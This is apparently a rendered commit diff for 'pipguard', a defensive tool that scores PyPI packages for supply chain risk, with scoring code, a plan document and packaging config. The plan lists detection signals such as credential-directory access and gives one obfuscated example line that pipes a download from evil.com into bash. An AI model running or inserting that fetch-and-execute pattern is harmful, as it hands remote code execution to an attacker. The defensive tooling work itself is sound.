if analysis_flags.get("shell_exec"):
|
|
48
|
+
add("Shell execution in setup.py", _WEIGHTS["shell_exec"])
|
|
49
|
+
|
|
50
|
+
if analysis_flags.get("base64_obfuscation"):
|
|
51
|
+
add("Base64 obfuscation", _WEIGHTS["base64_obfuscation"])
|
|
52
|
+
|
|
53
|
+
if analysis_flags.get("home_dir_access"):
|
|
54
|
+
add("Home directory access", _WEIGHTS["home_dir_access"])
|
|
55
|
+
|
|
56
|
+
if analysis_flags.get("env_access"):
|
|
57
|
+
add("Env variable access", _WEIGHTS["env_access"])
|
|
58
|
+
|
|
59
|
+
if analysis_flags.get("network_call"):
|
|
60
|
+
network_expected = (
|
|
61
|
+
classifier_context == "network_expected"
|
|
62
|
+
or readme_context == "network_expected"
|
|
63
|
+
)
|
|
64
|
+
if classifier_context == "pure_python":
|
|
65
|
+
add(
|
|
66
|
+
"Network call in setup.py (unexpected for pure Python)",
|
|
67
|
+
_WEIGHTS["network_call_full"],
|
|
68
|
+
)
|
|
69
|
+
elif network_expected:
|
|
70
|
+
add(
|
|
71
|
+
"Network call in setup.py (expected for this package type)",
|
|
72
|
+
_WEIGHTS["network_call_discounted"],
|
|
73
|
+
)
|
|
74
|
+
else:
|
|
75
|
+
add("Network call in setup.py", _WEIGHTS["network_call_full"])
|
|
76
|
+
|
|
77
|
+
if score <= 30:
|
|
78
|
+
verdict = "LOW"
|
|
79
|
+
elif score <= 60:
|
|
80
|
+
verdict = "MEDIUM"
|
|
81
|
+
else:
|
|
82
|
+
verdict = "HIGH"
|
|
83
|
+
|
|
84
|
+
return {"score": score, "verdict": verdict, "signals": signals}
|
|
@@ -0,0 +1,165 @@
|
|
|
1
|
+
# pipguard — Plan & Scope
|
|
2
|
+
|
|
3
|
+
> "Know what you're installing before you install it."
|
|
4
|
+
|
|
5
|
+
A CLI tool that intercepts `pip install` and analyzes packages for supply chain attacks before they touch your system. The data to detect malicious packages already exists — PyPI, OSV.dev, GitHub. The gap is workflow integration. Nobody has made checking automatic at the exact moment of install.
|
|
6
|
+
|
|
7
|
+
---
|
|
8
|
+
|
|
9
|
+
## The Problem
|
|
10
|
+
|
|
11
|
+
Supply chain attacks are increasing, especially in AI/ML where developers install unfamiliar packages constantly. Attack vectors: typosquatting (`reqeusts`, `nunpy`), dependency confusion, account takeover, slow poisoning (xz utils 2024), maintainer going rogue (colors.js). Common payload: steal API keys/SSH keys, open backdoors — all through `setup.py` which executes automatically on install.
|
|
12
|
+
|
|
13
|
+
---
|
|
14
|
+
|
|
15
|
+
## Architecture
|
|
16
|
+
|
|
17
|
+
### Layer 1 — Trust Score (API calls, no download)
|
|
18
|
+
|
|
19
|
+
| Signal | Source |
|
|
20
|
+
|--------|--------|
|
|
21
|
+
| Package age, version history | PyPI JSON API |
|
|
22
|
+
| Download spike > 300% week-over-week AND total downloads < 50k | pypistats.org |
|
|
23
|
+
| No linked GitHub repo | PyPI JSON API |
|
|
24
|
+
| Maintainer account age, # of other packages | PyPI JSON API |
|
|
25
|
+
| Maintainer changed between versions | PyPI JSON API |
|
|
26
|
+
| Known CVEs | OSV.dev API |
|
|
27
|
+
| GitHub README (only when classifiers are ambiguous) | GitHub API |
|
|
28
|
+
|
|
29
|
+
### Layer 2 — Static Code Analysis (AST-based)
|
|
30
|
+
|
|
31
|
+
Downloads the source tarball and analyzes `setup.py`, `pyproject.toml`, `__init__.py` — without executing anything.
|
|
32
|
+
|
|
33
|
+
Flags: network requests, env var access (`os.environ`), home dir access (`~/.ssh`, `~/.aws`), shell execution (`subprocess`, `eval`, `exec`), base64 obfuscation, DNS lookups.
|
|
34
|
+
|
|
35
|
+
**Why AST over grep:** AST catches obfuscated patterns grep misses:
|
|
36
|
+
```python
|
|
37
|
+
getattr(os, 'sys'+'tem')('curl evil.com | bash') # grep misses, AST catches
|
|
38
|
+
```
|
|
39
|
+
|
|
40
|
+
---
|
|
41
|
+
|
|
42
|
+
## Scoring
|
|
43
|
+
|
|
44
|
+
```
|
|
45
|
+
0–30 → LOW RISK 31–60 → MEDIUM RISK 61+ → HIGH RISK
|
|
46
|
+
```
|
|
47
|
+
|
|
48
|
+
| Signal | Points |
|
|
49
|
+
|--------|--------|
|
|
50
|
+
| Known CVE | +50 |
|
|
51
|
+
| Shell execution in setup.py | +40 |
|
|
52
|
+
| Base64 obfuscation | +35 |
|
|
53
|
+
| Package < 30 days old | +30 |
|
|
54
|
+
| Home directory access | +30 |
|
|
55
|
+
| Network call in setup.py | +25 |
|
|
56
|
+
| Reads env variables | +20 |
|
|
57
|
+
| Maintainer account < 60 days old | +20 |
|
|
58
|
+
| Download spike (< 50k total only) | +15 |
|
|
59
|
+
| No GitHub repo | +10 |
|
|
60
|
+
|
|
61
|
+
**Context-aware:** same flag scores differently based on trust profile. Network call from a 4-year-old package with 50M downloads weighs less than the same flag from a 2-week-old package. Age and downloads compound.
|
|
62
|
+
|
|
63
|
+
**No static whitelist.** A whitelist creates a blind spot — a compromised boto3 would silently pass. Context-aware scoring + classifier gating handles false positives without a trust bypass.
|
|
64
|
+
|
|
65
|
+
**Configurable weights** via `~/.pipguard/config.toml`. Ships with a `recommended` preset. Warns when user deviates significantly: `"Custom weights active — run pipguard config reset to restore recommended"`.
|
|
66
|
+
|
|
67
|
+
---
|
|
68
|
+
|
|
69
|
+
## Classifier-Gated GitHub Calls
|
|
70
|
+
|
|
71
|
+
PyPI classifiers (free — already in the PyPI response) gate whether the GitHub README call is made. GitHub's unauthenticated limit is 60 req/hr — a 20-package scan exhausts it fast without gating.
|
|
72
|
+
|
|
73
|
+
```
|
|
74
|
+
Pure Python classifiers + network call found → FLAG at full weight, skip GitHub
|
|
75
|
+
Networking / AI / Build Tools classifiers → Fetch GitHub README, discount if intent matches
|
|
76
|
+
No useful classifiers → Fetch GitHub README, default weight if unclear
|
|
77
|
+
```
|
|
78
|
+
|
|
79
|
+
**Pure Python classifiers:** `Topic :: Utilities`, `Topic :: Text Processing`, `Topic :: Software Development :: Libraries :: Python Modules`
|
|
80
|
+
|
|
81
|
+
**"Network expected" classifiers:** `Topic :: Internet :: WWW/HTTP`, `Topic :: System :: Networking`, `Topic :: Scientific/Engineering :: Artificial Intelligence`, `Topic :: Software Development :: Build Tools`
|
|
82
|
+
|
|
83
|
+
---
|
|
84
|
+
|
|
85
|
+
## CLI
|
|
86
|
+
|
|
87
|
+
```bash
|
|
88
|
+
pipguard install <package> # analyze then install
|
|
89
|
+
pipguard scan # scan requirements.txt
|
|
90
|
+
pipguard scan --ci --fail-on [medium|high] # CI mode, exits 1 on threshold (default: high)
|
|
91
|
+
pipguard info <package> [--no-cache] # report without installing
|
|
92
|
+
pipguard history # past scan results
|
|
93
|
+
pipguard update --force # wipe + refresh CVE cache immediately
|
|
94
|
+
```
|
|
95
|
+
|
|
96
|
+
**Interception:** uses pip's official plugin API (pip 23.1+), not a shell alias. An alias that crashes locks the developer out of pip entirely. A plugin degrades gracefully.
|
|
97
|
+
|
|
98
|
+
**Example output:**
|
|
99
|
+
```
|
|
100
|
+
$ pipguard install litellm
|
|
101
|
+
|
|
102
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
103
|
+
TRUST SCORE
|
|
104
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
105
|
+
Package age: 2 months ⚠️
|
|
106
|
+
Maintainer age: 3 weeks 🔴
|
|
107
|
+
Download spike: +380% ⚠️
|
|
108
|
+
Other packages: 0 🔴
|
|
109
|
+
Known vulns: 0 ✅
|
|
110
|
+
|
|
111
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
112
|
+
CODE ANALYSIS (setup.py)
|
|
113
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
114
|
+
Network requests: FOUND 🔴
|
|
115
|
+
Env var access: FOUND 🔴
|
|
116
|
+
Shell execution: NOT FOUND ✅
|
|
117
|
+
Obfuscation: NOT FOUND ✅
|
|
118
|
+
|
|
119
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
120
|
+
VERDICT: 🔴 HIGH RISK (Score: 75)
|
|
121
|
+
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
|
122
|
+
Proceed anyway? [y/N]
|
|
123
|
+
```
|
|
124
|
+
|
|
125
|
+
---
|
|
126
|
+
|
|
127
|
+
## Tech Stack
|
|
128
|
+
|
|
129
|
+
| Component | Choice |
|
|
130
|
+
|-----------|--------|
|
|
131
|
+
| Language | Python (dogfoods itself) |
|
|
132
|
+
| CLI | Typer |
|
|
133
|
+
| HTTP | httpx (API calls + tarball downloads — no requests) |
|
|
134
|
+
| AST | Python `ast` stdlib |
|
|
135
|
+
| Output | Rich |
|
|
136
|
+
| Cache | SQLite stdlib (`~/.pipguard/cache.db`) |
|
|
137
|
+
|
|
138
|
+
**Caching:** trust scores cached 24hr, CVE data 6hr. Shows `(cached)` on hits. `--no-cache` bypasses per-run. `pipguard update --force` wipes CVE cache immediately for zero-day events.
|
|
139
|
+
|
|
140
|
+
**Version pinning:** always checks the exact pinned version from requirements.txt, not latest. Warns on unpinned deps.
|
|
141
|
+
|
|
142
|
+
---
|
|
143
|
+
|
|
144
|
+
## Build Order
|
|
145
|
+
|
|
146
|
+
**Week 1 — Core**
|
|
147
|
+
- [ ] CLI skeleton (Typer), PyPI fetch, OSV.dev check, scoring, SQLite cache
|
|
148
|
+
|
|
149
|
+
**Week 2 — Code Analysis**
|
|
150
|
+
- [ ] Tarball download (httpx, version-specific), AST parser, red flag detection, classifier-gated scoring, GitHub README for ambiguous cases
|
|
151
|
+
|
|
152
|
+
**Week 3 — Polish**
|
|
153
|
+
- [ ] Rich output, requirements.txt scan, pip plugin integration, `--ci`/`--fail-on`/`--no-cache`/`--force`, configurable weights + preset warning, README + demo GIF
|
|
154
|
+
|
|
155
|
+
---
|
|
156
|
+
|
|
157
|
+
## vs. Existing Tools
|
|
158
|
+
|
|
159
|
+
| Tool | Gap |
|
|
160
|
+
|------|-----|
|
|
161
|
+
| `pip audit` | Only known CVEs — misses new malicious packages |
|
|
162
|
+
| socket.dev | Not a CLI intercept, separate workflow |
|
|
163
|
+
| OSV.dev | Database only, no workflow integration |
|
|
164
|
+
| Dependabot | Reacts after install, not before |
|
|
165
|
+
| **pipguard** | Intercepts at install, combines trust signals + AST analysis |
|
|
@@ -0,0 +1,20 @@
|
|
|
1
|
+
[build-system]
|
|
2
|
+
requires = ["hatchling"]
|
|
3
|
+
build-backend = "hatchling.build"
|
|
4
|
+
|
|
5
|
+
[project]
|
|
6
|
+
name = "pipguard-cli"
|
|
7
|
+
version = "0.1.0"
|
|
8
|
+
description = "Supply chain attack prevention for pip installs"
|
|
9
|
+
requires-python = ">=3.10"
|
|
10
|
+
dependencies = [
|
|
11
|
+
"typer>=0.9.0",
|
|
12
|
+
"httpx>=0.27.0",
|
|
13
|
+
"rich>=13.0.0",
|
|
14
|
+
]
|
|
15
|
+
|
|
16
|
+
[project.scripts]
|
|
17
|
+
pipguard = "pipguard.main:app"
|
|
18
|
+
|
|
19
|
+
[tool.hatch.build.targets.wheel]
|
|
20
|
+
packages = ["pipguard"]
|